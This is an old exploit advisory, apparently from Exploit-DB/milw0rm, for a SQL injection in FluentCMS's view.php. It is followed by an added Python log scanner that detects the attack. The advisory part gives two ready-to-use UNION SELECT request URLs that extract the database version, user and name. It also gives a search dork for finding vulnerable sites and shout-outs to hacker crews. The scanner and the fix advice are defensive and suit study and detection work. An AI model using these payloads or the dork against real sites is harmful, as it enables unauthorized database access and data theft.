FluentCMS - 'view.php' SQL Injection

EDB-ID: 5509
Author: cO2
Type: webapps
Platform: PHP
Date: 2008-04-27

###################################################
[~] FluentCMS Remote Sql İnj. Vuln.
[~] Founder: cO2 [ Algeria Security Crew ]
[~] HomePage: http://www.DZ-Secure.com
[~] Greetz : To all Hackerz from Algeria & All My Friends . . .
[~] Contact: c02@Hotmail.de
[~] Greetz2 : Str0ke,Inphex,DigitalMind,His0k4,Stack-Terrorist,mArEzZinA,Waraxe,Str0xo
[~] Special thanks to : Inphex
[~] Dork :  Powered by FluentCMS
[~] Exploit :
http://www.xxx.org/view.php?sid=-5926+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,unhex(hex(version())),17,unhex(hex(user())),unhex(hex(database())),20,21,22,23,24,25,26,27,28,29,30,31,32--
or
http://www.xxx.org/view.php?sid=-3+union+select+1,2,3,unhex(hex(user())),5,6,7,unhex(hex(database())),9,10,11,12,13,14,unhex(hex(version())),16--
---------------------
http://www.DZ-Secure.com
---------------------
###############################################

# milw0rm.com [2008-04-27]
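
Detection note (an added example, not part of the original advisory or of FluentCMS): both requests above put a UNION SELECT into the `sid` parameter of view.php, where only an integer id is expected. The Python sketch below scans web access logs for view.php requests whose `sid` is not a plain integer and labels the UNION SELECT cases. The log lines, addresses, and the function names `classify_sid` and `scan` are constructed for illustration; the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; addresses are documentation placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Apr/2008:10:00:01 +0000] "GET /view.php?sid=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [27/Apr/2008:10:00:07 +0000] "GET /view.php?sid=-3+union+select+1,2,3,unhex(hex(user())),5-- HTTP/1.1" 200 4980',
    '192.0.2.44 - - [27/Apr/2008:10:00:09 +0000] "GET /view.php?sid=-5926%20UNION%2F**%2FSELECT%201,2 HTTP/1.1" 200 4975',
    '192.0.2.10 - - [27/Apr/2008:10:00:15 +0000] "GET /index.php?page=2 HTTP/1.1" 200 2048',
    '192.0.2.77 - - [27/Apr/2008:10:00:21 +0000] "GET /view.php?sid=abc HTTP/1.1" 404 310',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# UNION [ALL] SELECT with whitespace or inline comments between the keywords.
GAP = r'(?:\s|/\*.*?\*/)+'
UNION_RE = re.compile(r'union' + GAP + r'(?:all' + GAP + r')?select', re.I | re.S)
# Information functions used in the advisory's requests: version(), user(), database().
INFO_FUNCS_RE = re.compile(r'\b(?:version|user|database)\s*\(', re.I)

def classify_sid(value):
    """Return None for a plain non-negative integer sid, else a reason string."""
    if re.fullmatch(r'[0-9]{1,10}', value):
        return None
    if UNION_RE.search(value):
        suffix = "+info-functions" if INFO_FUNCS_RE.search(value) else ""
        return "union-select" + suffix
    return "non-numeric"

def scan(lines, script="/view.php", param="sid"):
    """Return (client, reason, decoded sid) for every suspicious request."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith(script):
            continue
        # parse_qs percent-decodes and maps '+' to a space, as the PHP side sees it.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            reason = classify_sid(value)
            if reason:
                findings.append((line.split()[0], reason, value))
    return findings

if __name__ == "__main__":
    for client, reason, value in scan(SAMPLE_LOG):
        print(f"{client}\t{reason}\t{value}")
```

The same integer-only rule for `sid`, enforced in the application before the value reaches the query (integer cast plus a parameterized statement), removes the injection point rather than only detecting its use.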